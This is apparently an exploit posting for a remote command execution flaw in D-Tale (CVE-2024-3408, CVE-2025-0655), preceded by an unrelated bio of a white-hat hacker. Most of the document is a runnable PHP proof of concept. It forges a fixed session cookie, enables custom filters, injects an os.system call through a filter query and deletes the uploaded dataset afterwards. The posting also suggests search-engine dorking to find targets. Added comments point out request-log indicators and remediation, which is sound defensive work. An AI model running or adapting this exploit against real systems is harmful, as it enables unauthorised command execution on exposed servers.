Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.


=============================================================================================================================================
| # Title : D Tale v3.10.0 remote command execution vulnerability (PoC written in PHP) |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://pypi.org/project/dtale/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: Exploiting D-Tale Remote Command Execution Vulnerability Using PHP

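(Related: https://packetstorm.news/files/id/189509/ — linked CVE numbers: CVE-2024-3408, CVE-2025-0655.) Note that the title names v3.10.0, while the version check in the code below treats every release up to and including 3.15.1 as affected.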

[+] save code as poc.php.

[+] Set Target = line 102

[+] Usage = php poc.php

[+] PayLoad :

<?php
/**
 * Proof-of-concept client for the D-Tale command-execution issue that this
 * page links to CVE-2024-3408 and CVE-2025-0655.
 *
 * Requests issued, in order (each carries the same fixed session cookie):
 *   GET  /dtale/popup/upload                 - version probe
 *   POST /dtale/upload                       - multipart upload of payload.csv
 *   GET  /dtale/update-settings/<data_id>    - settings={"enable_custom_filters":true}
 *   GET  /dtale/test-filter/<data_id>        - query=...&save=true
 *   GET  /dtale/cleanup-datasets?dataIds=<data_id>
 *
 * For defenders: that sequence, an update-settings call that switches on
 * enable_custom_filters, and a test-filter query containing __import__ are
 * the request-log indicators visible in this code. Remediation is to run a
 * D-Tale release that fixes the linked CVEs (take the version from the vendor
 * advisory) and to keep the service off untrusted networks.
 */
class D_Tale_RCE_Exploit {

// Hard-coded session cookie sent on every request. Its first dot-separated
// segment base64-decodes to {"logged_in":true,"username":"whatever"}.
// NOTE(review): a server that accepts this static value is presumably not
// signing sessions with a deployment-specific secret - confirm against the
// CVE-2024-3408 advisory.
private $session = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc';
// Base URL of the D-Tale instance; request paths are appended to it verbatim.
private $target_url;
// Dataset id parsed from the upload response in exploit(); unset until then.
private $data_id;
// Command string interpolated into the filter query in exploit().
private $payload;

/**
 * Stores the base URL and the command string; performs no validation and no I/O.
 *
 * @param string $target_url Base URL, concatenated with each request path.
 * @param string $payload    Command string later embedded in the filter query.
 */
public function __construct($target_url, $payload) {
$this->target_url = $target_url;
$this->payload = $payload;
}

/**
 * Issues a GET to target_url . $uri and returns the raw body.
 *
 * @param string   $uri     Path and query string appended to the base URL.
 * @param string[] $headers Raw header lines passed to CURLOPT_HTTPHEADER.
 * @return string|false Response body, or false when curl_exec() fails; no
 *                      HTTP status code or cURL error is inspected.
 */
private function send_get_request($uri, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
// Certificate verification is off: the response (including the version string
// check_vulnerability() parses) can come from any endpoint answering on this address.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

/**
 * Issues a POST to target_url . $uri with a pre-built body and returns the raw body.
 *
 * @param string   $uri     Path appended to the base URL.
 * @param string   $data    Request body, sent as-is via CURLOPT_POSTFIELDS.
 * @param string[] $headers Raw header lines passed to CURLOPT_HTTPHEADER.
 * @return string|false Response body, or false when curl_exec() fails; no
 *                      HTTP status code or cURL error is inspected.
 */
private function send_post_request($uri, $data, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
// Same as the GET helper: TLS peer verification is disabled.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

/**
 * Version-only check against the upload popup page.
 *
 * Reads the value of the hidden input with id "version" that the server
 * renders into /dtale/popup/upload and compares it with 3.15.1. The threshold
 * here is 3.15.1 although the page title names v3.10.0.
 *
 * This is a banner comparison, not a functional test: it does not show whether
 * custom filters can actually be enabled on the instance. It also returns
 * false when the request fails or the input is absent, so false does not by
 * itself mean the instance is patched.
 *
 * @return bool true only when a version value was found and version_compare()
 *              reports it as <= 3.15.1.
 */
public function check_vulnerability() {
$headers = ['Cookie: session=' . $this->session];
$response = $this->send_get_request('/dtale/popup/upload', $headers);

// Cheap pre-filter before running the regular expression.
if (strpos($response, 'version') !== false) {
preg_match('/<input type="hidden" id="version" value="(.*?)">/', $response, $matches);
if (isset($matches[1]) && version_compare($matches[1], '3.15.1', '<=')) {
return true;
}
}
return false;
}

/**
 * Runs the three-request sequence: upload, settings change, filter query.
 *
 * Prints progress to stdout and returns nothing. Only the upload response is
 * parsed; the responses to the settings change and the filter query are
 * discarded, so the final message is printed whether or not the server
 * accepted either request.
 *
 * @return void
 */
public function exploit() {
// Step 1: upload a one-part multipart body holding a placeholder CSV.
// Only the data_id in the response is used afterwards.
$mime_boundary = "---------------------------" . rand();
$data = "--$mime_boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"payload.csv\"\r\n";
$data .= "Content-Type: text/csv\r\n\r\n";
$data .= "payload_data\r\n";
$data .= "--$mime_boundary--\r\n";

$headers = [
'Content-Type: multipart/form-data; boundary=' . $mime_boundary,
'Cookie: session=' . $this->session
];

$response = $this->send_post_request('/dtale/upload', $data, $headers);

// The dataset id is pulled out of the response text with a regex rather than json_decode().
preg_match('/"data_id":"(.*?)"/', $response, $matches);
if (isset($matches[1])) {
$this->data_id = $matches[1];
echo "Data ID: " . $this->data_id . "\n";
} else {
echo "Failed to get data ID.\n";
return;
}

// Step 2: ask the server, through a plain GET on the update-settings URL for
// this data_id, to set enable_custom_filters to true. The response is ignored.
// NOTE(review): this client-driven settings override is presumably what
// CVE-2025-0655 tracks - confirm against the advisory.
$settings = json_encode(['enable_custom_filters' => true]);
$this->send_get_request("/dtale/update-settings/{$this->data_id}?settings=" . urlencode($settings), $headers);

// Step 3: send a filter query that reaches os.system through builtins.__import__.
// The literal "__import__" in a test-filter query string is a usable detection pattern.
$query = "@pd.core.frame.com.builtins.__import__('os').system('" . $this->payload . "')";
$this->send_get_request("/dtale/test-filter/{$this->data_id}?query=" . urlencode($query) . "&save=true", $headers);

// Printed unconditionally: a patched or hardened server produces the same line,
// so this output is not evidence either way in a patch-verification run.
echo "Payload executed successfully.\n";
}

/**
 * Requests /dtale/cleanup-datasets for the dataset created by exploit().
 *
 * Does nothing when no data_id was obtained. The response is not checked, so
 * the message is printed regardless of the outcome.
 * NOTE(review): if the endpoint removes the dataset as its name suggests, the
 * instance's dataset list will not show the upload afterwards; HTTP access
 * logs of the request sequence are then the evidence to look for.
 *
 * @return void
 */
public function cleanup() {
if ($this->data_id) {
$headers = ['Cookie: session=' . $this->session];
$this->send_get_request("/dtale/cleanup-datasets?dataIds={$this->data_id}", $headers);
echo "Cleaned up the dataset.\n";
}
}
}

// Usage: script entry point. Runs as soon as the file is executed.
// Placeholder base URL from the original listing (plain HTTP, no trailing slash).
$target_url = 'http://target.site.com';
// The listing's example command string; it is embedded in the filter query by exploit().
$payload = 'id'; // Example payload

$exploit = new D_Tale_RCE_Exploit($target_url, $payload);

// The gate is the version-banner comparison only. The else branch is also
// reached when the request fails or no version input is found, so
// "Target is not vulnerable." does not establish that an instance is patched.
if ($exploit->check_vulnerability()) {
echo "Vulnerable version detected. Exploiting...\n";
$exploit->exploit();
// cleanup() is a no-op when exploit() did not obtain a data_id.
$exploit->cleanup();
} else {
echo "Target is not vulnerable.\n";
}
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================